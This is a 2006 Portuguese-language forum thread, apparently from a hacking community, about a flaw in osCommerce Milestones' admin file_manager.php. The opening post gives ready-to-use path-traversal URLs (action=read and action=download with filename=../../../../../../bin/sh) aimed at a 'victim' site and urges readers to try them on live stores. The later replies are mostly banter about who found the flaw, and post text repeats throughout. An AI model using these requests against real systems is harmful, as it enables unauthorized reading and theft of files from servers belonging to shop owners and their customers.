Title: Vulnerabilidade no osCommerce Milestones....
Post by: Anonymous on 05 de July , 2006, 04:50:21 PM
Post by: Anonymous on 05 de July , 2006, 04:50:21 PM
aeh galera...fuçando em alguns sites com sistema oscommerce milestones rodando....
descobri de um arquivo q permite a visualização e downloads de arquivos do server....
o arquivo é o file_manager.php que pode ser usado das seguintes formas:
para leitura :
http://www.vitima.com.br/loja/admin/fil ... hp?action= (http://www.vitima.com.br/loja/admin/file_manager.php?action=)read&filename=../../../../../../bin/sh
ou download:
/loja/admin/file_manager.php?action=download&filename=../../../../../../bin/sh
testei e consegui ver algumas coisas interessantes..... testem...bom proveito =)
obs: se o adm do site tiver protegido a area do arquivo file_manager.php ...obviamente vc vai precisar autenticar...flw
... bye
descobri de um arquivo q permite a visualização e downloads de arquivos do server....
o arquivo é o file_manager.php que pode ser usado das seguintes formas:
para leitura :
http://www.vitima.com.br/loja/admin/fil ... hp?action= (http://www.vitima.com.br/loja/admin/file_manager.php?action=)read&filename=../../../../../../bin/sh
ou download:
/loja/admin/file_manager.php?action=download&filename=../../../../../../bin/sh
testei e consegui ver algumas coisas interessantes..... testem...bom proveito =)
obs: se o adm do site tiver protegido a area do arquivo file_manager.php ...obviamente vc vai precisar autenticar...flw
... bye
Title: Re: Vulnerabilidade no osCommerce Milestones....
Post by: HadeS on 05 de July , 2006, 05:43:00 PM
Post by: HadeS on 05 de July , 2006, 05:43:00 PM
Você descobriu isso? Tem certeza?
HadeS
HadeS
Title: Re: Vulnerabilidade no osCommerce Milestones....
Post by: Anonymous on 05 de July , 2006, 05:57:37 PM
Post by: Anonymous on 05 de July , 2006, 05:57:37 PM
bom....ja havia lido sobre algumas falhas nele....
porem dessa forma com q passei nao sei se tem em otro lugar....
..eu tenho ele instalado aki e fiz uns testes aki localmente mesmo.....ai vi q poderia se fazer akilo...
se mais alguem ja viu tbem....nao sei....naum tenho certeza d ter sido o primeiro a descobrir.....alias setou postando para contribuir....nao fiz um ctrl+c de lugar algum...por isso naum postei fonte.....talvez tenha me expressado mau....dizendo "descobri".....falei assim pq consegui achar ....desculpe pela ma expressão entaum...
100+
flw....
porem dessa forma com q passei nao sei se tem em otro lugar....
..eu tenho ele instalado aki e fiz uns testes aki localmente mesmo.....ai vi q poderia se fazer akilo...
se mais alguem ja viu tbem....nao sei....naum tenho certeza d ter sido o primeiro a descobrir.....alias setou postando para contribuir....nao fiz um ctrl+c de lugar algum...por isso naum postei fonte.....talvez tenha me expressado mau....dizendo "descobri".....falei assim pq consegui achar ....desculpe pela ma expressão entaum...
100+
flw....
Title: Re: Vulnerabilidade no osCommerce Milestones....
Post by: Anonymous on 05 de July , 2006, 06:00:23 PM
Post by: Anonymous on 05 de July , 2006, 06:00:23 PM
Que eu me recorde essas falhas do Commerce são antigas...
Title: Re: Vulnerabilidade no osCommerce Milestones....
Post by: Anonymous on 05 de July , 2006, 06:07:08 PM
Post by: Anonymous on 05 de July , 2006, 06:07:08 PM
bom...ok....naum sabia entaum...achei na cagada e quis colaborar.....talvez naum acreditem entaum...nao posso fazer nada...talvez eu tenha falhado em nao ter pesquisado antes...
....errar é humano horas....
criticas a parte ,,.,.... pensarei duas vezes antes de postar algo aki....
100+.....
Title: Re: Vulnerabilidade no osCommerce Milestones....
Post by: Skayler on 05 de July , 2006, 07:07:57 PM
Post by: Skayler on 05 de July , 2006, 07:07:57 PM
Celio, relaxa, ninguém é perfeito...
Ninguém critico, e se ofederam, não foi porque quis...
De qualquer forma, é uma falha.
E legal da sua parte postar aqui no fórum.
[]'s
Skayler
Ninguém critico, e se ofederam, não foi porque quis...
De qualquer forma, é uma falha.
E legal da sua parte postar aqui no fórum.
[]'s
Skayler
Title: Re: Vulnerabilidade no osCommerce Milestones....
Post by: HadeS on 05 de July , 2006, 07:19:31 PM
Post by: HadeS on 05 de July , 2006, 07:19:31 PM
Sim, concordo plenamente com o Skayler.
Em momento nenhum quis ofender, só queria saber uma coisa, e você respondeu.
E aliás, bom pra você que descobriu uma falha sozinho. Continue assim.
HadeS
Em momento nenhum quis ofender, só queria saber uma coisa, e você respondeu.
E aliás, bom pra você que descobriu uma falha sozinho. Continue assim.
HadeS
Title: Re: Vulnerabilidade no osCommerce Milestones....
Post by: Anonymous on 05 de July , 2006, 07:48:16 PM
Post by: Anonymous on 05 de July , 2006, 07:48:16 PM
Skayler e HadeS.....tudo blz entaum.....
Curto pra karamba o forum aki.....e tbem a galera daki.....ja fiz amizade com varios e naum estou aki de forma alguma pra discutir com ninguem....só quero q saiba q sei q ninguem aki é idiota e cairía em uma mentira qualquer...nao estou aqui pra me aproveitar de descobertas e conhecimentos alheios...nao postarei nada para ganhar "credito", apenas para colaborar com akeles q comigo colaboram até agora....
"Todos do Darkers"...
Valew a todos....
té +...
Curto pra karamba o forum aki.....e tbem a galera daki.....ja fiz amizade com varios e naum estou aki de forma alguma pra discutir com ninguem....só quero q saiba q sei q ninguem aki é idiota e cairía em uma mentira qualquer...nao estou aqui pra me aproveitar de descobertas e conhecimentos alheios...nao postarei nada para ganhar "credito", apenas para colaborar com akeles q comigo colaboram até agora....
"Todos do Darkers"...
Valew a todos....
té +...